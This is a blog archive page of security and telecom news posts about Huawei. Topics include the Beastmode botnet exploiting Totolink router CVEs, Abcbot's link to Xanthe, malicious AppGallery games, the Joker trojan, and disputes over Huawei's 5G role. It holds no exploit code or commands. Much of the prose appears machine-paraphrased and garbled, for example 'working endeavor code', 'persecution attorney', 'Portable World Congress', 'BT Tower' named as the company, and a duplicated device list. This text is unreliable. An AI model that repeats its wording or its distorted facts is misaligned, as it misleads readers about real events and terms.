Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Huawei. Show all posts

Due to New Router Flaws, Beastmode Botnet Has a Greater DDoS Potential

 

Beastmode (or B3astmode), a Mirai-based decentralized denial-of-service (DDoS) botnet, has extended its list of exploits to include three new ones, all of which target various models of Totolink devices.

Totolink is a well-known electronics sub-brand of Zioncom which recently published firmware patches to address three critical-severity flaws. DDoS botnet programmers wasted little time in adding these holes to their arsenal to take advantage of the window of opportunity before Totolink router customers installed the security patches. Beastmode has gained control of vulnerable routers, giving it access to hardware resources it can use to execute DDoS attacks.

The following is a list of vulnerabilities in TOTOLINK routers: 

  • CVE-2022-26210 (CVSS 9.8) - A command injection vulnerability that could be used to execute arbitrary code. 
  • CVE-2022-26186 is a vulnerability that affects computers (CVSS score: 9.8) TOTOLINK N600R and A7100RU routers are vulnerable to a command injection vulnerability. 
  • CVE-2022-25075 to CVE-2022-25084 (CVE-2022-25075 to CVE-2022-25084) (CVSS scores: 9.8) - A buffer overflow vulnerability has been discovered in certain TOTOLINK routers, resulting in code execution.  

CVE-2021-4045 is used to target the TP-Link Tapo C200 IP camera, which the researchers haven't seen in any other Mirai-based campaign. For the time being, the exploit has been implemented incorrectly and does not operate. "Device users must still update its camera software to correct this issue," the researchers suggest, citing indications of continued development. 

Although the flaws affect different devices, they all have the same effect: they allow the attacker to insert commands to download shell scripts via the wget command and infect the device with Beastmode. The shell scripts differ depending on which devices have been infected and which exploit has been used.

The vulnerabilities were not the only ones introduced to the Beastmode botnet; its creators also added the following previous bugs:

D-Link is affected by CVE-2021-45382, a remote code execution bug. DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L are the DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L. 
  • CVE-2021-4045 — Unauthenticated remote code execution bug in the TP-Link Tapo C200 IP camera. 
  • CVE-2017-17215 —  Unauthenticated remote code execution problem in Huawei HG532
  • CVE-2016-5674 — Remote execution of arbitrary PHP code through the log argument in the Netgear ReadyNAS product line.
Ensure to deploy the available security updates which correct the vulnerabilities mentioned above to prevent Mirai versions from seizing control of any router or IoT devices. Totolink users should go to the vendor's download center, choose the device model, and download and install the most recent firmware version available. 

A slow internet connection is one of the symptoms if your router has been exploited. Additional indicators include the device heating up more than usual, inability to get into the administration panel, changing settings, or an unresponsive device, which a typical user is likely to overlook.

Malware Abcbot Related to the Xanthe Cryptomining Bug Developer's

 

Abcbot, the newly discovered botnet has a longer history than what was originally believed. The Xanthe-based cryptojacking campaign found by Cisco's Talos security research team in late 2020 has a clear link, according to the ongoing examination of this malware family. When Talos was notified of an intrusion on one of their Docker honeypots, they discovered malware that looked like a bitcoin mining bot. 

The virus is known as Xanthe, and its main goal is to mine cryptocurrency using the resources of a compromised system. Based on the findings, the same threat actor is behind both Xanthe and Abcbot, and its goal has shifted from mining cryptocurrency on compromised hosts to more classic botnet activity like DDoS attacks.

Abcbot attacks, first reported by Qihoo 360's Netlab security team in November 2021, are triggered by a malicious shell script that targets insecure cloud instances operated by cloud service providers such as Huawei, Tencent, Baidu, and Alibaba Cloud to download malware that co-opts the machine to a botnet but not before terminating processes from competing threat actors and establishing persistence. The shell script in question is an updated version of one found by Trend Micro in October 2021, which targeted Huawei Cloud's vulnerable ECS instances. 

Further investigation of the botnet, which included mapping all known Indicators of Compromise (IoCs) such as IP addresses, URLs, and samples, revealed Abcbot's code and feature-level similarities to that of a cryptocurrency mining operation known as Xanthe, which spread the infection using incorrectly configured Docker implementations. 

The semantic similarities between the two malware families range from the way the source code is formatted to the names given to the routines, with some functions having not only identical names and implementations (e.g., "nameservercheck"), but also have the word "go" appended to the end of the function names (e.g., "filerungo"). According to experts, Abcbot also contains spyware that allows four malicious users to be added to the hacked machine: 
  • Logger 
  • Ssysall 
  • Ssystem 
  • sautoupdater 
Researchers believe that there are substantial links between the Xanthe and Abcbot malware families, implying that the same threat actor is involved. The majority of these would be difficult and inefficient to recreate identically, including string reuse, mentions of shared infrastructure, stylistic choices, and functionality that can be seen in both instances. If the same threat actor is behind both campaigns, it signals a shift away from cryptocurrency mining on compromised devices and toward botnet-related operations like DDoS attacks.

Huawei's App Gallery Hosted Malicious Apps Installed by 9M+ Android Users

 

Around 9.3 million Android devices have been infected with a new type of malware that masquerades as dozens of arcade, shooter, and strategy games on Huawei's AppGallery marketplace in order to gather device information and victims' phone numbers. 

Researchers from Doctor Web discovered the mobile campaign and categorized the trojan as "Android.Cynos.7.origin," simply because it is a modified variant of the Cynos malware. Some of the 190 rogue games discovered were made for Russian-speaking players, while others were made for Chinese or worldwide audiences. 

The applications requested the victims for permission to make and control phone calls once they were installed and then utilized to access and capture their phone numbers as well as other device data including geolocation, mobile network characteristics, and system metadata. 

All of these harmful games are primarily geared at children, who are easy targets for having all of their permissions activated. Huawei has currently uninstalled all of the vulnerable games from its AppGallery app store. If users have a Huawei smartphone and aren't sure if they're infected or not, some of the malicious apps are mentioned below: 
  • “[Команда должна убить боеголовку]” with more than 8000 installs. 
  • “Cat game room” with more than 427000 installs. 
  • “Drive school simulator” with more than 142000 installs. 
  • “[快点躲起来]” with more than 2000000 installs 
Furthermore, the Doctor Web malware analysts have previously warned Huawei about these harmful apps. Doctor Web researchers stated, "At first glance, a mobile phone number leak may seem like an insignificant problem. Yet in reality, it can seriously harm users, especially given the fact that children are the games' main target audience." 

"Even if the mobile phone number is registered to an adult, downloading a child's game may highly likely indicate that the child is the one who actually uses the mobile phone. It is very doubtful that parents would want the above data about the phone to be transferred not only to unknown foreign servers, but to anyone else in general."

500,000 Huawei Devices hit by the Joker Malware

 

Security researchers have discovered that over 500,000 Huawei smartphone users who inadvertently subscribe to premium mobile services have downloaded apps contaminated by the Joker malware. For the past couple of years the malware family of Joker has infected apps on Google's Play Store, but it is the first time on Huawei phones. Using the company's in-house platform - App Gallery, Huawei users are not actually able to access the Google Play Store due to business restrictions in the USA. Researchers also discovered in the App Gallery some 10 apparently harmful applications containing malicious command and control server connectivity code for installation and additional components. 

A source noted that “Doctor Web’s virus analysts have uncovered the first malware on App Gallery―the official app store from the Huawei Android device manufacturer. They turned out to be dangerous Android. Joker trojans function primarily to subscribe users to premium mobile services. In total, our specialists discovered that 10 modifications of these trojans have found their way onto App Gallery, with more than 538,000 users having installed them.”

However, the researchers mentioned that the malware might subscribe the user to up to five services, but that restriction could also be changed at any time by the threat actor. Digital keyboards, a camera app, a launcher, an online messenger, an adhesive set, coloring programs, and a game were included in the malicious applications list. Most of the applications were developed by one (Shanxi Kuailaipai Network Technology Co., Ltd.) developer and two from separate developers. More than 538,000 Huawei users have installed these 10 applications, as per the Doctor Web’s reports. 

Doctor Web notified Huawei of these applications and the company detected and removed them from the App Gallery. Although new users cannot download them anymore, whereas if the applications were on the devices of other users then they must be cleaned manually. Upon being enabled, the malware transmits a configuration file to the remote server, including a task list, premium service websites, and JavaScript which imitates user interaction states the researchers. 

The history of Joker malware goes back to 2017 and has consistently made its way through the Google Play store distributed games. In October 2019, Kaspersky Malware Researcher Tatyana Shishkova tweeted over 70 compromise applications that made it official. And the malware reports in Google Play continued to surge. In early 2020, Google announced the removal of some 1,700 Joker-infected applications. Joker remained in the shop last February and even in July of last year he still slips through Google's defenses.

BT Tower Delays Huawei's Removal from EE Company's Network by 2 Years


BT Tower, which is a communication tower in London, further suspends the replacement of Huawei from the EE company's core network. EE is a British ISP and mobile network company which deals with 4g/5g phones, broadband, and sims. According to the reports, Huawei is expected to continue as a part of the EE network. The news comes as a surprise because in 2018, the company BT said that within two years, it would remove Huawei equipment from its network hub.


But now, after two years, BT says that the new 100% core mobile traffic would be ready by 2023 on its new Ericsson built equipment, even though the government deadline was January 2020. Besides this, BT condemns the government for also controlling 65% of the network's perimeter to get relieved of Huawei's equipment.

About 5G core and its importance- 
A smartphone's network's core is like a brain or the heart of the device. Inside the 5G center, voice and other data are directed over different sub-networks and network servers to make sure the data reaches the destination. The process goes like this-

  • Authentication of users to make sure only the subscribed users get the benefits 
  • Calling the correct radio tower for connecting with different person's smartphone networks. Controlling call-forwards and voicemail facilities. 
  • Sending SMS and multimedia from one smartphone to others. 
  • Communicating the data to 3rd party websites and apps. 
  • Tracking the data used to calculate user customer usage. 

To make sure that the targets are completed in the given time scale set by the government, and side by side follow with their attention on 5G networks, it is essential to prioritize the transfer of customers to the new Ericsson core network, for both the 5G and 4G customers, says a spokesperson. Whereas, the US is continuously pressuring officials to the urgent prohibition of Huawei. Earlier this month, some conservative MPs even went against their party for urging this outright ban on Huawei. "Recent events have shown how necessary it is to disentangle China from UK security infrastructure. Any delay will meet with great resistance," says former MP Liam Fox, International Trade and Defence Secretary.

America Vs China! The USA Alleges Huawei to be a Technology Thief and Spy for China?


In view of recent reports, China and the US have taken their technology war to court. Now, the US firms allege that the telecom colossus, Huawei has been planning to rip them off of their technology for “decades”.

Hence, the American organizations decided to expand the premises of their lawsuit against the Chinese mega-company.

The prosecuting attorney mentioned that Huawei did indeed violate the terms of the contract with the companies of the US by stealing robot technology, trade secrets and such.

Per sources, Huawei has straightaway denied all the allegations and has cited that the US is merely threatened by the competition and hence are trying to run down the name of Huawei.

Per newspaper reports, the mega smartphone maker’s chief financial officer and the founder’s daughter are held captive in Canada, struggling against extradition.

According to sources, there are charges of fraud and “sanctions violations” on the founder’s daughter, which she has waved off and denied.

Huawei pretty strong-headedly is maintaining that this lawsuit and the charges on the company are trivial attempts at tarnishing the reputation of their company and attempts at depleting stakes of competition.

Per reports, the fresh accusations of the US against Huawei include trade secret embezzlement, racketeering and even sending spies to obtain confidential information.

Sources reveal, that the persecution attorney also said that Huawei with its stolen data cut both times and cost in the research and development for the company which helped it climb the steps faster than the others.

Per Huawei, the newer charges are just another way of bringing up older claims. Nevertheless, it doesn’t look like the US plan to withdraw their claims or the lawsuit in the near future or at all.

This technological rift has a strong possibility of transforming into a political dispute between America and China. The US is forcing countries like the UK to pull back their support from Huawei, continuing to say that the equipment could be used by China for spying.

Relations between China and the US are down a very flimsy and unpredictable road. All the same, the UK still continues its business ties with Huawei but with possible limits.

India Invites Huawei and ZTE to Participate in 5G Trials


The demands for bringing fifth-generation (5G) technology of mobile networks in India are on a rise and the government is looking forth to begin the 5G trials, The Department of Telecommunications (DoT) has invited all applicants to show use-cases of 5G network in India, including Chinese telecom company Huawei Technologies Co. Ltd and ZTE. On Monday, telecom minister Ravi Shankar Prasad was specifically asked about Huawei, wherein he told that at this stage, all stakeholders are invited.

“5G trials will be done with all vendors and operators,” telecom minister Ravi Shankar Prasad told media. “We have taken an in-principle decision to give 5G spectrum for trials.”

Amid all the ongoing economic and diplomatic tensions between the US and China, the invitation for the 5G trial comes as the very first official stance taken by India on the matter. It also offered Huawei some breathing space after the global scrutiny it has been subjected to regarding network security concerns. The claims made by the US put into perspective the probable exploitation of the equipment, that China can do to spy onto other nations; meanwhile, to its defense, Huwaei constantly denied the allegations.

The US has also alerted the Indian government about the potential risks that will come along with these Chinese companies being allowed to deploy next-generation technology in India, Morgan Ortagus, the US state department’s spokesperson while acknowledging the important role 5G networks will be playing in the upcoming era, also told how high are the stakes of letting companies under the command of authoritarian regimes deploy technology in other nations. “All countries should adopt national security policies in order to prevent untrusted companies from misusing any part of their future 5G network plans,” Ortagus further added.

As India is yet to finalize the framework and devise a clear plan for 5G technology, Prasad said in the Rajya Sabha that, “The government is creating an enabling framework for the deployment of affordable and secure 5G services in India.”

Referencing from the statements given by Vimal Wakhlu, a former chairman of Telecommunications Consultants India Ltd., “Whether it is Huawei or Ericsson or any other company, India needs to build a system, which can detect any malware and not depend on the brand of a company or a country."

“Any country is capable of snooping on us. The reason some people have been advocating a ban on Huawei is that if it is barred, the market for equipment becomes slightly less competitive and hence it can be sold at higher prices."

Huawei to Reward Hackers for Discovering Any ‘Secret Backdoors’ In Its Smartphone Technology


With the hopes of outdoing Google, Huawei announced in a "big bounty launch" to reward hackers for exhibiting a "critical" weakness in one of its Android devices.

Revealing the program at a private event for a few of the world's top Android hackers at Munich, Germany, a week ago, so much so that it even gave an example as to how the hackers could bag the first prize, as they would need to get remote access to the device without the target 'having to click anything'.

A high-severity hack would even see that the hacker could assume control over a phone when they had direct access to it.

The company is said to have been following Apple's lead in keeping the 'bug bounty invite-only'. As revealed on Twitter by Forbes 30 Under 30 alum Maria Markstedter, who was one of the invited guests, the researchers who were welcomed would likewise be offered tokens to invite other altruistic hackers too.

The bug bounty was at first announced by TechCrunch recently, yet no subtleties on payments or logistics have been uncovered.

Huawei additionally announced that for a "high"- severity issue, hackers can procure up to $110,000 (€100,000), while Google, in the interim, presents to $200,000 and $100,000 for exhibits of comparative attacks on its Pixel phones.

While bug bounties are very basic among major smartphone makers, it's Apple and Google fundamentally who are behind two of the most well-known.

Anyway, one significant explanation suspected as to why Huawei did this might be on the grounds that could provide solid evidence that it isn't concealing any 'secret backdoors' in its most prevalent phones that the Chinese government could use.

Google restricts Huawei’s access to Android apps





Google restricts the access of its Android operating system and apps for Chinese tech giant Huawei after US’s President Donald Trump administration blacklisted the firm.

The order not only impacted Google but the US chip-makers as well.  Intel Corp, Qualcomm Inc., Xilinx Inc., and Broadcom Inc. have all stopped doing business with the Chinese tech giant

"We are complying with the order and reviewing the implications," a Google spokesperson said on Monday. Huawei, the world's No. 2 smartphone seller, relies on a suite of Google services for its devices, including the Android system and the Google Play app store.

Huawei will now only be able to use the public version of Android and the new phones will not have Google play store, Gmail, and other services provided by Google.

The users who are now using the Huawei smartphones will not be affected by this order, but they won’t be able to update their phones. 

However, the Chinese tech company claim that for the last three years that have been working on their own operating system.

"Huawei has been building an alternative operating system just in case it is needed," said Huawei spokesperson Glenn Schloss. "We would like to be able to continue operating in the Microsoft and Google ecosystems," he added.

The company has bought Microsoft’s operating system license for its laptops and tablets. Meanwhile, Microsoft (MSFT) did not immediately respond to a request for comment.


US Pressures Its Allies against the Usage of Chinese Firm Huawei’s Technology; Suspects the Products to Spy on Other Countries




The US pressures its allies to not utilize Chinese firm Huawei's innovation to assemble the new 5G networks as its authorities are worried that China could be utilizing the Huawei products to spy on different nations.

"It's a hugely complex strategic challenge," said GCHQ chief Jeremy Fleming, all the while giving accentuation on the requirement for better cyber-security practices in the telecoms industry. In spite of the fact that the National Cyber Security Centre - some part of GCHQ - said a few weeks earlier that any hazard presented by the company could be overseen.

The vast majority of the UK's mobile companies, for instance Vodafone, EE and Three are known to have been working with Huawei on 5G, yet as of now they are anticipating the results of a government review, due in March or April, that will further choose to decide whether or not they'll be permitted to proceed with it.

An on-going report from the Royal United Services Institute said it would be "naive" and "irresponsible" to permit Huawei the access.

 “We have to understand the opportunities and threats from China's technological offer - understand the global nature of supply chains and service provision, irrespective of the flag of the supplier. Take a clear view on the implications of China's technological acquisition strategy in the West, and help our governments decide which parts of this expansion can be embraced, which need risk management, and which will always need a sovereign, or allied, solution." Said Fleming in his speech at an event in Singapore.

Focusing on the requirement for more grounded cyber-security over the telecoms sector, Fleming stated: "Vulnerabilities can and will be exploited. But networks should be designed in a way that cauterises the damage."

Since 5G is critical to the UK government therefore in order to guarantee that Britain stays competitive as a country, as per Gartner senior research director Sylvain Fabre, “They are reviewing the situation, in a way that hasn't been done in the past, but it sounds like all options are still on the table," he told the BBC.

Meanwhile the US is seeking after criminal allegations against Huawei and its CFO, Meng Wanzhou. Talking at a round table at Portable World Congress in Barcelona on the 24th of February, Huawei's rotating chairman, Guo Ping, says that,

"Huawei needs to abide by Chinese laws and also by the laws outside China if we operate in those countries. Huawei will never, and dare not, and cannot violate any rules and regulations in the countries where we operate."

A Botnet Compromises 18,000 Huawei Routers




A cyber hacker, by the pseudonym Anarchy, claims to have made a botnet within 24 hours by utilizing an old vulnerability that has reportedly compromised 18, 000 routers of Chinese telecom goliath Huawei.

As indicated by a report in Bleeping Computer, this new botnet was first recognized in this current week by security researchers from a cyber-security organization called Newsky Security.

Following the news, other security firms including Rapid7 and Qihoo 360 Netlab affirmed the presence of the new danger as they saw an immense recent uptick in Huawei device scanning.
The botnet creator contacted NewSky security analyst and researcher Ankit Anubhav who believes that Anarchy may really be a notable danger who was already distinguished as Wicked.

The activity surge was because of outputs looking for devices that are vulnerable against CVE-2017-17215, a critical security imperfection which can be misused through port 37215. These outputs to discover the vulnerable routers against the issue had begun on 18 July.

While the thought processes have still not been clarified, the hacker revealed to Anubhav that they wished to make "the biggest and the baddest botnet in town...”
"It's painfully hilarious how attackers can construct big bot armies with known vulns," the security researcher later added.

The working endeavor code to compromise Huawei routers by utilizing this known defect was made public in January this year. The code was utilized as a part of the Satori and Brickerbot botnets, and also a series of variations which depended on the scandalous Mirai botnet, which is as yet going quite strong.